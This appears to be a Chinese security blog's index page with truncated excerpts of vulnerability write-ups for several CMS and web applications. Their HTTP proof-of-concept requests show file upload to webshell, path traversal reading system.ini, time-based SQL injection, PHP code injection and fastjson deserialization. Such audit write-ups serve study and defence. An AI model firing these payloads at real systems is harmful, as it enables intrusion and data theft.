FG72qvSeWBLe
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 简介 版本 2.7 poc 下面两个接口都可以文件上传和删除并且接口的文件上传和文件删除的poc是一样的,后面分析为什么/api/database/upload POST/api/database/uploadHTTP/1.1 Host:...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 fastjson 基本信息 版本 fastjson<=1.2.24 jdk-8u144-windows-x64 靶场 hell-java-sec 漏洞原理 fastjson默认使⽤@type指定反序列化任意类,攻击者可以通过在Java...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 系统漏洞文件及版本 版本 1.3.1 漏洞分类 文件上传 /admin/config/uploadicon.php POC POST/admin/config/uploadicon.phpHTTP/1.1 Host:demo.com C...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 简述 版本 2.11 文件上传 以下路由都存在此漏洞,过程都相似/admin/index.php?r=admin-user%2Fself-update/admin/index.php?r=article%2Fupdate/admin/in...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 简介 版本 5.7 漏洞位置 文件上传 file_manage_control.php xss article_add.php 分析 文件上传 找到文件中的文件上传位置。 红框前都是对参数的初始化,找到文件临时存放位置,将临时文件保存...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 基本信息 版本 18.11 poc 获取cookie GET/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequestHTTP/1....
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 描述 后台数据库模块的执行sql语句的输入框可以在绕过的情况下进制一句话文件的写入。从而达到文件上传的目的。存在问题的目录如下:application\admin\controller\Database.php 版本 2024.1000.4...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 基本信息 版本 1.3.9 poc GET/ok_admin/file/download?title=1.txt&url=../../../..//windows/system.iniHTTP/1.1 Host:host Acce...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 POC sql注入 GET/js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=listHTTP/1.1 Host:demo...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 源码下载地址:帝国软件官方-产品下载中心(phome.net) 0x00漏洞成因 网址后台有个可以执行sql语句的功能并且可以实现一句话写入达到文件上传的功能 0x01漏洞分析 通过bp抓包发现执行sql语句的文件e->admi...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 POC 文件读取 //我读的是windows/system.ini GET/public/index.php?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b1b3b2x322s333b37...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 0x00漏洞poc 上传: index.php?d=main&m=flow&a=copymode&ajaxbool=true POST: id=1&name=a{};phpinfo();classa 访问:...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 0x00poc POST/weiphp5/public/index.php/home/Index/bind_followHTTP/1.1 Host:192.168.249.128:81 Pragma:no-cache Cache-Contr...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 靶场安装地址:/index.php/install 漏洞成因: 对文件后缀逻辑判断不当,当上传文件后缀为php时,该in_array($extension,['gif','jpg','jpeg','bmp','png','swf'])判...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持 靶场安装地址:/index.php/index.html(因为我找了好久才找到) 漏洞原因: 以下两句代码将输入进来的压缩包直接解压,当压缩包中存在一个木马或是其他危险文件时就可以getshell $archive=newPclZip(...
侵权声明 本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。 如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[360619623@qq.com]。我们将在确认后的合理时间内采取适当措施,包括删除相关内容。 感谢您的理解与支持。 漏洞原理: call_user_func(代码执行,系统命令)实现rce 漏洞成因: 用seay工具自动审计得出一个命令执行点。 判断参数param[1]和参数log[$param[0]]是否可控。 首先走读param[1]参数 由代码...